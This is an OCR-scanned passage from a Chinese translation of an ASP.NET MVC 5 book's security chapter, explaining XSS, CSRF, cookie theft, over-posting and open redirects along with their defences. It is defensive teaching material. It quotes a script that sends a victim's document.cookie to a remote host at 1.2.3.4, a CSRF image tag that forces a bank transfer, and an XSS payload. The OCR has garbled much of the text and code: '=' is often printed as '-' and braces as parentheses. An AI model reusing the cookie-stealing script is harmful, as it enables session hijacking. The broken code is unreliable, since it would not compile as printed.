字符 串 编码 来 防御 一 些 可 以 通过 Ajax.JavaScriptStringEncode 辅 助 函数 进行 的 复杂 攻击 。 下 面 
的 代码 示例 演示 了 如 何 实现 这 一 防御 功能 。 首 先 添加 一 条 @using 语 句 来 引入 AntiXSS 编 码 器 
的 名 称 空间 ， 然 后 再 使 用 其 中 的 Encoder.JavaScriptEncode 辅 助 函数 。 代 码 如 下 所 示 : 


@using Microsoft.Security.Application 
er 
ViewBag.Title - "Home Page"; 
) 
QGsection featured { 
«section class-"featured"» 
«div class-"content-wrapper"» 
Xhgroup class-"title"» 
«hl»8(ViewBag.Title.«/hl» 
<h2 id-"welcome-message"»«/h2» 
«/hgroup» 
«/div» 
«/section» 
Į 


xm 


(section scripts ( 
Qif(ViewBag.UserName !- null) ( 
«script type-"text/javascript"» 
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$(function () { 
var msg = 'Welcome, GEncoder.JavaScriptEncode( 
ViewBag.UserName, false)!'; 
$("fwelcome-message").html (msg).hide().show('slow'); 

); 

</script> 

} 

} 


执行 这 段 代码 后 ， 我 们 就 会 看 到 前 面 的 攻击 不 再 成 功 ， 如 图 7-17 所 示 。 
TE EEEE + 


ASP.NET 


Welcome, Jon\x3cscript\x3e alert 
(\x27pwnd\x27) \x3c/script\x3e! 


6 2014 - My ASP.NET Application 


图 7-17 


Q ix 尽管 使 用 ASPNET 包 含 的 AntiXSS 编 码 器 很 容易 ， 但 是 找 出 更 适合 使 用 白 
名 单方 法 而 不 是 标准 的 黑 名 单方 法 的 场合 却 有 些 困 难 . XSS 只 有 那么 多 方法 , 我 
们 已 有 很 长 时 间 没 看 到 有 哪 种 新 XSS 方 法 能 绕 过 标准 的 黑 名 单方 法 了 ,重要 的 是 
始终 编码 输出 ， 这 应 该 能 够 让 我 们 的 网 站 不 受 XSS 攻 击 之 害 。 


7.6.2 威胁 : 跨 站 请 求 伪造 


跨 站 请 求 伪 造 (Cross-Site Request Forgery，CSRF， 有 时 也 用 缩写 XSRF 表 示 ) 攻 击 要 比 前 
面 讨 论 的 简单 的 跨 站 脚本 攻击 更 具 危 险 性 。 本 节 讲 解 跨 站 请 求 伪造 攻击 ， 主 要 从 它 的 危害 及 
如 何 防止 它 两 方面 加 以 阑 述 。 

1. 威胁 概述 


为 充分 地 理解 CSRF 的 概念 ， 我 们 将 其 分 为 两 部 分 来 阐述 ， 分 别 是 XSS 和 混淆 代理 
(confused deputy)。 前 面 已 经 介绍 了 XSS， 但 是 混淆 代理 是 一 个 新 概念 ， 值 得 讨论 一 下 。 
Wikipedia 上 这 样 描述 混淆 代理 攻击 : 

混淆 代理 是 一 个 计算 机 程序 ， 它 被 其 他 部 分 程序 无 阅 地 愚弄 ， 以 至 于 错误 地 使 用 自己 的 
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权限 。 它 是 特权 扩大 (privilege escalation) 的 一 个 具体 类 型 。 
— —http://en.wikipedia.org/wiki/Confused deputy problem 


在 此 类 情形 中 ， 代 理 就 是 用 户 的 浏览 器 ， 它 受到 了 愚弄 以 至 于 误 用 其 权限 ， 将 用 户 呈 现 
给 远程 的 网 站 。 为 进一步 阐明 这 个 问题 ， 下 面 列举 一 个 简单 而 繁琐 的 示例 。 

假设 正在 逐步 构建 一 个 外 观 精 美的 网 站 ， 人 允许 用 户 登 录 和 退出 ， 以 及 在 站 点 中 进行 权限 
内 的 任何 操作 。 我 们 决定 编写 自己 的 AccountController， 因 为 这 没什么 困难 的 。 在 
AccountController 控 制 器 中 ，Logout 操 作 尽量 保持 简单 。 因 为 我 们 不 太 关心 特性 ， 所 以 没有 使 
用 标准 AccountController 中 的 一 些 特性 ， 如 [HttpPost] 和 [ValidateAntiForgeryToken]: 


public ActionResult Logout() { 
AuthenticationManager.Signout (); 
return RedirectToAction("Index", "Home"); 
) 


注意 ”如果 读 者 没有 看 出 来 ， 那 么 这 里 加 以 说 明 。 这 里 的 这 个 例子 没有 太 认 真 


设计 。AccountController 中 的 安全 措施 是 有 其 意义 的 ， 本 节 将 会 展示 出 来 。 


现在 ， 假 设 站 点 允许 输入 白 名 单 中 有 限 的 HTML( 一 个 可 接受 的 标签 或 字符 的 列表 ， 列 表 
中 的 内 容 可 能 另行 编码 ) 作 为 评论 系统 的 一 部 分 (可 能 编写 的 是 论坛 应 用 程序 或 博客 应 用 程序 ) 
一 一 大 部 分 的 HTML 都 经 过 了 精简 或 净化 ， 但 是 因为 想 让 用 户 能 够 发 布 截图 ， 所 以 对 图 片 不 
加 限制 。 

如 果 有 一 天 ， 某 人 将 在 评论 中 添加 了 这 个 稍 带 恶意 的 HTML 图 片 标签 : 


«img src-"/account/logout" /> 


现在 , 一 旦 有 人 访问 该 页 面 , 浏览 器 就 会 自动 请 求 这 个 “图 片 ” 其 实 这 并 不 是 一 个 图 片 ， 
然而 请 求 之 后 他 们 就 会 退出 站 点 。 同样， 这 未 必 是 一 个 CSRF 攻 击 ， 却 展示 了 如 何在 用 户 不 知 
不 觉 的 情况 下 , 使用“ 挂 羊 头 卖 狗肉 ”的 伎俩 来 欺骗 浏览 器 向 任意 指定 的 站 点 发 出 GET 请 求 。 
在 这 个 例子 中 ， 浏 览 器 发 出 GET 请 求 ， 本 来 是 想 请 求 图 片 ， 相 反 ， 它 却 调用 退出 例 程 并 传递 
用 户 的 cookie。 这 就 是 混淆 代 理 。 

CSRF 攻 击 是 基于 浏览 器 的 工作 方式 运作 的 。 在 登录 到 一 个 站 点 后 ,信息 将 以 cookie 形 式 
存储 到 浏览 器 中 ， 可 能 是 存储 在 内 存 中 的 cookie(“ 会 话 ”cookie)， 也 可 能 是 写 到 硬盘 文件 中 
更 为 持久 的 cookie。 通 过 这 两 种 cookie 中 的 任意 一 种 , 浏览 器 会 告诉 站 点 这 是 一 个 真实 用 户 发 
出 的 请 求 。 

使 用 XSS 加 混淆 代理 (和 其 他 攻击 一 样 ,再 使 用 一 些 社会 工程 ) 来 实现 对 用 户 攻 击 的 能 力 正 
是 CSRF 的 核心 。 


注意 另 一 个 站 点 上 的 XSS 弱 点 仍 可 能 链接 到 我 们 的 站 点 , 而 且 除 了 XSS, 还 有 
| 其 他 方法 可 能 导致 CSRF 一 一 混淆 代理 场景 才 是 关键 . 


遗憾 的 是 ， 很 多 站 点 恰巧 都 没有 针对 CSRF 这 一 弱点 采取 切实 有 效 的 防御 措施 (下 面 即将 
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谈 到 这 一 点 )。 

下 面 来 看 一 个 真实 的 CSRF 攻 击 例子 ， 从 黑客 角度 看 ，CSRF 攻 击 能 对 受 大众 喜 欢 而 未 受 
保护 的 站 点 产生 很 大 的 破坏 。 这 里 没有 使 用 真实 的 名 称 ， 不 妨 将 该 站 点 称 为 “Big Massive 
Site”. 

需要 立刻 指明 的 是 ， 黑 客 与 Big Massive Site 站 点 用 户 之 间 的 游戏 是 一 场 实力 不 均衡 的 较 
量 。 有 多 种 方式 可 以 增 大 这 种 不 均衡 性 ， 这 些 稍 后 就 会 介绍 ， 但 由 于 Big Massive Site 站 点 每 
天 有 将 近 5 千 万 个 请 求 ， 所 以 局 势 有 利于 黑客 一 方 。 

现在 来 阐述 游戏 的 本 质 一 一 查找 可 以 对 Big Massive Site 站 点 的 安全 漏洞 做 哪些 操作 ， 如 
包含 站 点 上 的 链接 评论 。 在 网 上 冲浪 尝试 各 种 事物 时 ， 积 累 了 一 个 “广泛 使 用 的 在 线 银行 站 
点 ”(Widely Used Online Banking Sites) 列 表 ， 这 些 银行 站 点 支持 在 线 转账 和 账单 支付 。 经 过 
研究 ， 了 解 了 这 些 广泛 使 用 的 在 线 银行 站 点 响应 转账 请 求 的 原理 ， 我 们 会 发 现 有 一 种 方式 存 
在 非常 严重 的 安全 漏洞 一 -转账 标识 在 URL 中 ， 如 下 所 示 : 


http://widelyusedbank.example.com?function-transfer&amount-1000& 4 
toaccountnumber-23234554333&from-checking 


这 种 标识 方法 令 人 非常 吃惊 ， 看 起 来 简直 思春 之 极 -一 哪 家 银行 会 这 样 做 ? 遗憾 的 是 ， 
这 个 问题 的 答案 不 是 一 家 银行 而 是 很 多 家 银行 在 做 ， 原 因 很 简单 一 Web 开 发 人 员 过 分 信任 
浏览 器 。 上 面 的 URL 请 求 依赖 于 这 样 的 假设 : 服务 器 将 使 用 来 自 会 话 cookie 的 信息 来 验证 用 
户 的 身份 和 账户 。 其 实 ， 这 并 不 是 一 个 很 坏 的 假设 一 -会话 cookie 中 的 信息 可 以 避免 每 次 页 
面 请 求 时 都 要 重新 登录 。 浏 览 器 必须 要 记 住 一 些 信息 。 

上 面 还 有 一 些 内 容 没有 讨论 到 ， 即 需要 使 用 一 些 社会 工程 方面 的 知识 。 以 黑客 的 身份 登 
录 到 Big Massive Site 站 点 中 ， 将 如 下 内 容 作 为 评论 输入 到 其 中 一 个 主页 面 上 : 

Hey, did you know that if you're a Widely Used Bank customer the sum of the 


digits of your account number add up to 30? It's true! Have a look: 
http://www.widelyusedbank.example.com." 


然后 退出 Big Massive Site， 并 用 第 二 个 假 账户 再 次 登录 站 点 ， 以 不 同名 称 的 虚构 用 户 在 
上 面 的 “种 子 ”(seed) 评 论 后 面 留 下 一 个 评论 : 
"OMG you're right! How weird!«img src -" 


http://widelyusedbank.example.com?function-transfer&amount-1000&toaccount 
number-23234554333&from-checking" />. 


Widely Used Bank 的 客户 看 到 评论 后 ， 很 可 能 就 会 登录 他 们 的 账户 ， 并 计算 账号 数字 的 
累加 和 。 如 果 计 算 之 后 发 现 累加 和 不 等 于 30, 他 们 就 会 回 到 Big Massive Site, 再 次 阅读 评论 (或 
留 下 自己 的 评论 ,“ 不 对 ， 我 的 累加 和 不 是 30”)。 

遗憾 的 是 ，Perfect Victim 的 浏览 器 仍然 把 他 的 登录 会 话 信息 保存 在 内 存 中 一 一 也 就 是 说 
他 仍然 处 于 登录 状态 ! 当 他 浏览 到 带 有 CSRF 攻 击 的 页 面 时 ，CSRF 页 面 就 会 向 银行 的 站 点 
发 送 一 个 请 求 (而 银行 站 点 却 不 知道 发 送 请 求 的 另 一 端 是 黑客 ), 结果 Perfect Victim 的 钱 就 丢 
失 了 。 

在 评论 中 带 有 CSRF 攻 击 的 链接 图 片 将 作为 一 个 不 完整 的 红 X 来 泻 染 , 而 大 部 分 人 都 会 把 
它 看 成 一 个 损坏 的 头像 或 表情 符号 。 然 而 ,事实 上 ， 它 是 一 个 使 用 GET 请 求 在 服务 器 端 执行 
操作 的 远程 页 面 调用 一 一 也 就 是 骗取 现金 的 混淆 代理 攻击 。 很 凑巧 的 是 ， 有 问题 的 浏览 器 竟 
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然 是 Perfect Victim 的 浏览 
这 几乎 是 完美 的 犯罪 ! 
这 种 攻击 不 仅仅 局 限于 简单 图 像 标签 /GET 请 求 的 欺骗 ; 它 还 可 以 很 好 地 扩展 到 垃圾 邮件 
应 用 领域 ， 垃 圾 邮件 传播 者 向 人 们 发 送 虚 假 链接 ， 并 费 尽 周折 地 让 人 们 单 击 链接 ， 以 使 人 们 
进入 他 的 站 点 (与 大 部 分 僵尸 攻击 类 似 )。 当 人 们 单 击 链接 登录 到 他 的 站 点 时 ， 隐 藏 的 FRAME 
或 一 些 脚本 将 自动 使 用 HTITP POST 请 求 向 银行 提交 一 个 表单 ， 试 图 转账 。 如 果 此 时 恰好 有 一 
个 Widely Used Bank 的 客户 在 未 退出 银行 网 站 的 情况 下 单 击 了 这 个 链接 ， 那 么 此 次 攻击 就 会 
成 功 。 
回顾 前 面 的 论坛 帖子 中 的 社会 工程 诈骗 ， 为 让 后 一 个 攻击 取得 成 功 ， 只 需 再 添加 一 个 额 
外 的 跟 帖 即 可 : 


因此 这 是 不 可 追踪 的 (假设 在 巴哈马 群岛 等 地 已 经 有 假 账户 )。 


Wow! And did you know that your savings account number adds up to 50? This is so weird 
— read this news release about it: 


«a href-"http://badnastycsrfsite.example.com"»CNN.com«/a» 
It's really weird! 


显然 ， 这 里 甚至 不 需要 使 用 XSS， 只 要 植 入 URL， 等 待 那些 思春 至 极 的 人 来 上 钩 就 行 ( 即 
先进 入 到 他 们 在 Widely Used Bank 上 开设 的 账户 ， 然 后 再 重 定向 到 为 他 们 准备 的 虚假 页 面 
http://badnastycsrfsite.example.com) 。 


2. 阻止 CSRF 攻击 


可 能 有 人 认为 ， 这 一 问题 应 该 由 框架 来 解决 一 确实 如 此 ! ASPNET MVC 提 供 了 解决 方 
法 并 且 把 它 交 给 了 程序 员 , 因此 , 更 准确 的 说 法 是 , ASPNET MVC 应 该 使 程序 员 做 正确 的 事 ， 
事实 也 正 是 如 此 。 


1) 令 牌 验证 

ASP.NET MVC 框 架 提供 了 一 个 阻止 CSRF 攻 击 的 好 方法 ， 它 通过 验证 用 户 是 否 自愿 地 向 
站 点 提交 数据 来 达到 防御 攻击 的 目的 。 实 现 这 一 方法 最 简单 的 方式 就 是 ， 在 每 个 表单 请 求 中 
插入 一 个 包含 唯一 值 的 隐藏 输入 元 素 。 可 以 使 用 HTML 辅 助 方法 在 每 个 表单 中 包含 如 下 代码 
来 生成 该 隐藏 输入 元 素 : 


<form action="/account/register" method="post"> 
QHtml .AntiForgeryToken () 


</form> 
Html.AntiForgeryToken 辅 助 方法 会 输出 一 个 加 密 值 作为 隐藏 的 输入 元 素 : 
«input type="hidden" value-"012837udny31w90hjhf7u"» 


该 值 将 与 作为 会 话 cookie 存 储 在 用 户 浏览 器 中 的 另 一 个 值 相 匹配 。 在 提交 表单 时 ， 
ActionFilter 就 会 验证 这 两 个 值 是 否 匹 配 : 


[ValidateAantiforgeryToken] 
public ActionResult Register(...) 
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虽然 这 种 方法 就 可 以 阻止 大 部 分 的 CSRF 攻 击 , 但 它 并 非 能 很 好 地 防御 所 有 的 CSRF 攻 击 。 
上 面 的 示例 中 讲解 了 如 何在 网 站 上 自动 注册 用 户 ， 从 中 可 以 看 出 防伪 造 令 牌 的 方法 可 以 阻止 
Register 方 法 上 大 部 分 基于 CSRF 的 攻击 ， 但 它 不 会 终止 外 面 的 机 器 人 ， 这 些 机 器 人 仍然 继续 
寻求 在 网 站 上 自动 注册 用 户 和 制造 垃圾 邮件 (spam) 的 方法 。 本 章 后 面 将 讨论 解决 这 类 情况 的 
Jk. 

2) 略 等 的 GET 请 求 

客 等 的 GET 请 求 , 虽然 看 起 来 很 深奥 , 但 它 只 是 一 个 简单 概念 。 如 果 一 个 操作 是 暴 等 的 ， 
就 可 以 重复 执行 多 次 而 不 改变 执行 结果 。 一 般 来 说 , 仅 通过 使 用 POST 请 求 修改 数据 库 中 或 网 
站 上 的 内 容 ， 就 可 以 有 效 地 防御 全 部 的 CSRF 攻 击 ， 这 里 的 修改 包括 Registration、Logout 和 
Login 等 操作 。 这 种 方法 至 少 也 可 以 一 定 程度 上 限制 混淆 代理 攻击 。 


3) HttpReferrer 验 证 

HttpReferrer 验 证 通过 使 用 ActionFilter 处 理 。 这 种 情形 下 ， 可 查看 提交 表单 值 的 客户 端 是 
否 确 实在 目标 站 点 上 : 

public class IsPostedFromThisSiteAttribute : AuthorizeAttribute 

{ 


public override void OnAuthorize(AuthorizationContext filterContext) 
t 


if (filterContext.HttpContext !- null) 
{ 
if (filterContext.HttpContext.Request.UrlReferrer == null) 
throw new System.Web.HttpException("Invalid submission"); 


if (filterContext.HttpContext.Request.UrlReferrer.Host !- 
"mysite.com") 
throw new System.Web.HttpException 
("This form wasn't submitted from this site!"); 


) 
) 


然后 在 Register 方 法 上 添加 这 个 过 滤器 ， 代 码 如 下 : 


[IsPostedFromThisSite] 

public ActionResult Register(...) 

上 面 综述 了 几 种 不 同 的 防御 CSRF 的 方法 ， 这 也 正 是 MVC 的 意义 所 在 。 了 解 了 这 些 方 法 ， 
我 们 就 可 以 根据 自己 的 喜好 和 网 站 特点 来 选择 具体 使 用 哪 种 方法 。 


7.6.3 威胁 : cookie 资 窃 


cookie 是 一 种 增强 Web 可 用 性 方法 ,因为 大 部 分 网 站 在 用 户 登录 后 都 使 用 cookie 来 识别 用 
户 身份 。 如 果 没 有 cookie， 用 户 就 不 得 不 一 次 又 一 次 地 登录 网 站 。 但 是 如 果 攻 击 者 盗窃 了 
cookie， 他 就 可 以 冒充 用 户 身份 在 网 站 上 进行 操作 。 

作为 用 户 , 为 了 避免 自己 在 特定 站 点 上 的 cookie 被 盗 ， 可 在 浏览 器 上 选择 禁用 cookie, 但 
是 这 样 很 可 能 在 访问 某 个 网 站 时 弹出 无 礼 的 警告 “Cookies must be enabled to access this site". 
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本 节 介 绍 cookie 盗 窃 攻 击 ， 主 要 从 它 的 危害 及 如 何 防御 两 方面 来 曾 述 。 
1. 威胁 概述 


网 站 使 用 cookie 来 存储 页 面 请 求 或 浏览 会 话 之 间 的 信息 。 其 中 一 些 信息 是 无 关 紧 要 的 ， 
像 站 点 偏好 和 站 点 历史 等 ,但 是 其 他 站 点 可 以 在 不 同 请 求 中 确认 用 户 身 份 的 信息 却 非常 重要 ， 
比如 ASPNET 的 表单 验证 票据 (ASPNET Forms Authentication Ticket)。 

cookie 主 要 有 两 种 形式 : 

e 会 话 cookie: 会 话 cookie 存储 在 浏览 器 的 内 存 中 , 在 浏览 器 的 每 次 请 求 中 通过 HTTP 

头 信 息 进 行 传递 。 

e 持久 性 cookie: 持久 性 cookie 存储 于 计算 机 硬盘 上 的 实际 文本 文件 中 ， 并 与 会 话 

cookie 以 相同 的 方式 传递 。 

二 者 的 主要 区 别 在 于 : 站 点 在 会 话 结束 时 忘记 会 话 cookie， 而 持久 性 cookie 则 不 同 ,在 下 
一 次 访问 站 点 时 ， 站 点 仍然 记得 它 。 

如 果 能 够 窃取 某 人 在 一 个 网 站 上 的 身份 验证 cookie， 就 可 以 在 该 网 站 上 冒充 他 ， 执 行 他 
权限 内 的 所 有 操作 。 这 种 攻击 实际 上 非常 简单 ， 但 它 依赖 于 XSS 漏 洞 。 攻 击 者 只 有 在 目标 站 
点 上 注入 一 些 脚本 ， 才 能 窃取 cookie。 

在 对 StackOverflow.com 测 试 期 间 , CodingHorrorcom 的 Jeff Atwood 在 撰写 的 博文 中 提 到 了 
这 一 问题 : 

那么 ， 可 以 想象 一 下 ， 当 你 注意 到 网 站 上 一 些 企业 用 户 以 管理 员 身 份 登录 进来 ， 并 很 开 
心地 使 用 他 完全 不 受 约束 的 管理 权限 攻击 系统 ， 此 时 是 多 么 吃惊 。 

— http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html 


这 怎么 可 能 发 生 呢 ? 当然 是 XSS 的 功劳 。 这 一 切 都 是 从 向 用 户 资料 页 面 添 加 的 一 段 脚 本 
开始 的 : 

<img src=""http://www.a.com/a.jpg<script type=text/javascript 

src="http://1.2.3.4:81/xss.js">" /><<img 

src=""http://www.a.com/a.jpg</script>" 

StackOverflow.com 人 允许 在 评论 中 包含 有 一 定数 量 的 HTML 标 记 ， 这 也 正 是 XSS 黑 客 所 期 
望 的 。 Jeff 在 自己 的 博客 中 提供 的 一 个 示例 很 好 地 说 明了 : 攻击 者 如 何 将 脚本 注入 看 似 平常 的 
功能 页 面 ， 比 如 添加 一 个 屏幕 截图 。 

Jefft 对 XSS 注 入 攻击 采取 了 白 名 单 的 防御 措施 一 一 这 是 他 自己 编写 实现 的 。 在 这 个 情形 
中 ， 攻 击 者 利用 了 Jeff 自 己 编写 HTML 净 化 器 (sanitizer) 的 一 个 漏洞 : 


通过 精心 的 构建 ， 这 个 难看 的 URL 只 是 勉强 通过 了 净化 器 。 当 在 浏览 器 中 查看 时 ， 最 后 
泻 染 的 代码 会 加 载 和 执行 来 自 远程 服务 器 的 脚本 。JavaScript 代 码 如 下 所 示 : 

window.location-"http://1.2.3.4:81/r.php?u-" 

-document.links[1].text 


-"&l-"«document.links[1] 
+"&c="+document . cookie; 


此 时 ， 如 果 浏 览 器 加 载 了 这 个 注入 脚本 的 用 户 资料 页 面 ， 它 就 会 在 用 户 毫 不 知情 的 情况 
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下 把 他 们 的 cookie 传 送 给 某 个 远程 的 那 恶 服务 器 。 

这 样 攻击 者 就 迅速 地 盗 取 了 StackOverflow.com 用 户 的 cookie， 甚 至 Je 人 f 也 未 能 幸免 。 有 了 
Jeff 的 cookie， 攻 击 者 就 可 以 冒充 Jeff 的 身份 登录 站 点 (好 在 仍然 在 测试 阶段 )， 来 做 他 想 做 的 任 
何 操作 。 这 确实 是 一 个 非常 儿 独 的 黑客 。 


2. 使 用 HttpOnly 阻止 cookie 盗窃 


为 StackOverflow.com 攻 击 提供 便利 的 主要 有 两 方面 内 容 : 

e XSS 漏洞 : Jeff 坚持 自己 编写 反 XSS 攻击 代码 。 通 常情 况 下 ， 这 并 不 是 一 个 好 主意 ， 
而 应 该 依赖 类 似 于 BB Code 或 其 他 允许 用 户 格式 化 输入 值 的 方法 来 防御 攻击 .在 上 面 
的 示例 中 ，Jeff 为 攻击 者 打开 了 KSS 攻击 的 大 门 。 

e Cookie 缺陷 : 上面 的 示例 中 没有 将 StackOverflow.com 的 cookie 设置 为 禁用 来 自 客户 
端 浏览 器 的 修改 。 

事实 上 ， 可 停止 脚本 对 站 点 中 cookie 的 访问 ， 只 需要 设置 一 个 简单 标志 : HttpOnly。 可 以 

在 web.config 文 件 中 对 所 有 cookie 进 行 设置 ， 代 码 如 下 所 示 : 


<httpCookies domain="" httpOnlyCookies-"true" requireSSL-"false" /> 
也 可 在 程序 中 为 编写 的 每 个 cookie 单 独 设置 ， 代 码 如 下 : 


Response.Cookies["MyCookie"].Value-"Remembering you..."; 

Response.Cookies["MyCookie].HttpOnly-true; 

这 个 标志 的 设置 会 告知 浏览 器 ， 除 了 服务 器 修改 或 设置 cookie 之 外 ， 其 他 一 些 对 cookie 
的 操作 均 无 效 。 尽管 该 方法 非常 简单 , 但 它 却 可 以 阻止 大 部 分 基于 XSS 的 cookie 问 题 。 因 为 脚 
本 很 少 访问 cookie， 所 以 我 们 经 常 使 用 这 个 功能 。 


7.64 威胁: 重复 提交 


模型 绑 定 是 ASPNET MVC 提 供 的 一 个 强大 功能 ， 它 遵照 命名 约定 把 输入 元 素 映射 到 模 
型 属性 从 而 极 大 地 简化 了 处 理 用 户 输入 的 过 程 。 然 而 ， 它 也 成 了 攻击 的 另 一 种 媒介 ， 给 攻击 
者 提供 了 一 个 填充 模型 属性 的 机 会 ， 有 些 时 候 填 充 的 这 些 属性 甚至 都 没有 在 输入 表单 中 。 

本 节 将 讲解 重复 提交 (over-posting) 攻 击 ， 主 要 从 它 的 危害 及 如 何 防御 两 方面 来 阐述 。 


1. 威胁 概述 


ASPNET 模 型 绑 定 通过 重复 提交 呈现 了 另 一 种 攻击 媒介 。 下 面 列举 了 一 个 例子 ， 其 中 有 
一 个 允许 用 户 提交 评价 意见 的 商店 商品 页 面 : 


public class Review ( 

public int ReviewID ( get; set; } // Primary key 
public int ProductID ( get; set; ) // Foreign key 
public Product Product ( get; set; ) // Foreign entity 
public string Name ( get; set; } 

public string Comment ( get; set; } 

public bool Approved { get; set; } 
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我 们 想 向 用 户 展示 一 个 简单 表单 ， 其 中 只 包含 两 个 字段 一 一 Name 和 Comment: 


Name: GHtml.TextBox("Name") «br /> 
Comment: GHtml.TextBox ("Comment") 


因为 只 让 用 户 在 表单 上 看 到 Name 和 Comment 字 段 , 所 以 我 们 不 希望 用 户 能 够 自己 审核 通 
过 自己 的 评论 。 然 而 ， 存 在 大 量 的 Web 开 发 工具 可 供 恶意 用 户 向 查询 字符 串 或 提交 的 表单 数 
据 中 添加 "Approved=true"， 从 而 实现 干预 表单 提交 。 而 事实 上 ， 模 型 绑 定 器 并 不 知道 提交 的 
表单 中 包含 哪些 字段 ， 并 且 还 会 将 他 们 的 Approved 属 性 设置 为 true。 

更 糟 的 是 ， 由 于 Review 类 中 有 一 个 Product 属 性 ， 因 此 黑客 可 以 尝试 提交 一 些 名 称 类 似 于 
Product.Price 的 字段 值 , 这 样 可 能 会 改变 表 中 的 一 些 值 , 而 这 些 值 的 修改 超出 了 最 终 用 户 的 操 
作 权 限 。 


示例 : GITHUB.COM 上 的 大 规模 任务 分 配 


重复 攻击 利用 了 一 个 基于 MVC 架 构 模 式 的 特征 ， 该 特征 在 许多 Web 框 架 中 都 有 应 用 。 


2012 年 3 月 ， 这 种 攻击 利用 Ruby on Rails 的 大 规模 任务 分 配 功能 (mass assignment feature)， 被 
成 功 应 用 于 GitHub.com 网 站 的 攻击 。 攻 击 者 创建 了 一 个 新 的 公共 密 钥 来 管理 更 新 ， 并 通过 
向 创建 密 钥 的 表单 中 添加 隐藏 字段 , 手动 将 新 创建 的 密 钥 添 加 到 “rails” 用 户 的 管理 用 户 记 
RP: 

<input type=hidden value=USER_ID_OF_TARGET_ACCOUNT 

name=public_key[user_id]> 

攻击 者 把 目标 账户 的 用 户 ID 插入 到 表单 字段 的 value 特 性 中 ， 并 提交 表单 ， 然 后 就 拥有 了 
目标 用 户 内 容 的 管理 权限 。 攻 击 者 在 一 个 非常 简洁 的 博客 帖子 中 描述 了 这 次 攻击 , 博客 网 址 : 


http://homakov.blogspot.com/2012/03/how-to.html 


GitHub 立 即 修复 了 错误 ， 它 增加 了 对 传 入 表单 参数 的 验证 ， 关 于 修复 的 博客 文章 网 址 
如 下 : 
https://github.com/blog/1068-public-key-security-vulnerability- 
and-mitigation 


问题 的 关键 在 于 ， 这 不 仅仅 是 理论 上 的 攻击 。 这 次 事件 之 后 ， 这 种 攻击 便 广 为 人 知 。 
2. 使 用 Bind 特性 防御 重复 提交 攻击 


防御 重复 提交 攻击 的 最 简单 方法 就 是 ， 使 用 [Bind] 特 性 显 式 地 控制 需要 由 模型 绑 定 器 绑 
定 的 属性 。Bind 特 性 既 可 以 放 在 模型 类 上 ， 也 可 以 放 在 控制 器 操作 参数 中 。 它 可 以 使 用 前 面 
介绍 的 白 名 单方 法 来 指定 允许 绑 定 的 字段 , 比如 [Bind(Include="Name,Comment")], 也 可 以 使 用 
黑 名 单方 法 排除 禁止 绑 定 的 字段 ， 比 如 [Bind(Exclude="ReviewID，ProductID，Product, 
Approved"]。 通 常情 况 下 ， 白 名 单 相 对 于 黑 名 单 来 说 要 更 安全 些 ， 因 为 它 列举 了 想 要 绑 定 的 
属性 ， 而 黑 名 单列 举 了 所 有 不 想 绑 定 的 属性 ， 显 然 ， 前 者 更 容易 得 到 保证 。 

在 MVC 5 中 ， 通 过 基 架 构建 的 控制 器 在 控制 器 操作 中 自动 包含 一 个 白 名 单 ， 以 排除 ID 和 
链接 类 。 

下 面 给 出 了 如 何 注解 Review 模 型 类 ， 从 而 只 允许 绑 定 Name 和 Comment 属 性 的 代码 : 


161 


162 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


[Bind(Include-"Name, Comment")] 

public class Review ( 

public int ReviewID ( get; set; ) // Primary key 
public int ProductID ( get; set; ) // Foreign key 
public Product Product ( get; set; ) // Foreign entity 
public string Name ( get; set; ) 

public string Comment ( get; set; } 

public bool Approved ( get; set; } 

f 


另 一 种 方法 是 使 用 UpdateModel 或 TyUpdateModel 方 法 的 一 个 重 载 版 本 来 接收 一 个 绑 定 
列表 ， 代 码 如 下 所 示 : 


UpdateModel(review, "Review", new string[] { "Name", "Comment" }); 


避免 直接 绑 定 到 数据 模型 也 是 有 效 防御 重复 提交 攻击 的 一 种 方式 。 它 通过 使 用 一 个 视图 
模型 (View_Model)， 只 缓存 允许 用 户 设置 的 属性 来 阻止 攻击 。 下 面 的 视图 模型 就 消除 了 重复 
提交 问题 : 

public class ReviewViewModel { 

public string Name { get; set; } 


public string Comment { get; set; } 
} 


绑 定 到 视图 模型 而 不 是 数据 模型 的 好 处 在 于 ， 这 种 方法 要 简单 可 靠 得 多 。 我 们 并 不 需要 


记得 包含 白 名 单 或 黑 名 单 ， 并 及 时 更 新 它们 。 绑 定 到 视图 模型 的 方法 是 一 个 总 体 上 很 安全 的 
设计 一 一 绑 定 某 个 属性 的 唯一 方法 是 将 其 包含 到 视图 模型 中 。 


© 注意 Brad Wilson 撰 写 了 一 篇 好 文章 ， 题 目 为 “Input Validation vs. Model 

Validation”， 这 篇 文章 综述 了 模型 验证 的 安全 问题 。 当 验证 功能 包含 在 MVC 2 中 
发 布 时 ， 这 篇 文章 就 已 经 创作 完成 ， 但 到 现在 它 对 我 们 仍然 有 帮助 。 如 果 感 兴 
趣 ， 可 以 进行 阅读 ， 网 址 : http//bradwilson.typepad.com/blog/2010/01/input- 
validation-vs-model-validation-in-aspnet-mvc.html。 


7.6.5 威胁: 开放 重 定向 


ASPNET MVC 3 之 前 ，AccountController 很 容易 遭受 开放 重 定向 攻击 。 本 节 首 先 介 绍 开 
放 重 定向 攻击 的 工作 原理 ， 然 后 介绍 ASPNET MVC 5 的 AccountController 中 的 代码 如 何 阻止 
这 种 攻击 。 


1. 威胁 概述 


那些 通过 请 求 (如 查询 字符 串 和 表单 数据 ) 指 定 重 定向 URL 的 Web 应 用 程序 可 能 会 被 自 改 ， 
而 把 用 户 重 定 向 到 外 部 的 恶意 URL。 这 种 自 改 就 被 称 为 开放 重 定向 攻击 (open redirection attack)。 
每 当 应 用 程序 重 定向 到 一 个 指定 的 URL 时 ， 就 必须 确保 重 定 向 的 URL 未 被 算 改 。 对 于 
MVC 1 和 MVC 2， 默 认 AccountController 控 制 器 中 的 登录 操作 没有 进行 这 种 验证 ， 所 以 极 易 
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受到 开放 重 定向 攻击 。 


1) 一 个 简单 的 开放 重 定向 攻击 

为 了 更 好 地 理解 这 个 问题 ,首先 介绍 一 下 默认 的 MVC 2 Web 应 用 程序 中 登录 重 定向 的 工 
作 原 理 。 在 这 种 应 用 程序 中 ， 如 果 未 经 授权 的 用 户 尝 试 访问 一 个 带 有 Authorize 特 性 的 控制 器 
操作 ， 那 么 他 就 会 被 重 定 向 到 /Account/LogOn 视 图 。 这 个 重 定向 到 /Account/LogOn 的 URL 包 
